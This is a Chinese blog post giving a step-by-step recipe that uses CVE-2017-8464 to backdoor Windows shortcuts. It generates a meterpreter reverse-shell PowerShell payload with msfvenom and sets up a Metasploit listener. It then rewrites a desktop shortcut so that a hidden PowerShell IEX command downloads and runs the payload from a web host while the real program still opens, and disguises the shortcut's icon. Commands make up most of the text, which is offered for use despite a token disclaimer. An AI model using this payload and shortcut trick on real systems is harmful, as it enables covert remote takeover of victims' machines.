News:禁止使用本博客的技术文章、源码、工具等用于非法用途,否则后果自负。

CVE-2017-8464 个人利用小姿势

jasonx 164 0 条

0x00

CVE-2017-8464 个人利用小姿势

0x01 首先用MSF生成一个payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=端口 -f psh-reflection >shell.ps1

生成以后,把shell.ps1放到网站上。

0x02 msf设置监听payload

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 1.1.1.1
set LPORT 443

0x03 建立lnk后门

新建一个快捷方式,路径输入以下命令,后面的start c:\1.exe 可以换成正常的程序。

比如:目标机上桌面有个excel的快捷方式,假设excel程序的路径为c:\excel.exe
那么我们可以修改他这个快捷方式为以下命令,后面加上&start c:\excel.exe
这样当目标打开excel快捷方式的时候,会下载运行我们的后门,并且excel也能正常打开。

cmd.exe /c start /min powershell -w hidden ""IEX (New-Object Net.WebClient).DownloadString('http://www.xxxx.com/shell.ps1'); ""&start c:\1.exe

0x04 修改lnk图标

你可以右键,为你的lnk后门修改图标,使其更具有迷惑性。
系统图标路径如下;

%systemroot%\system32\shell32.dll

与本文相关的文章

发表我的评论

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址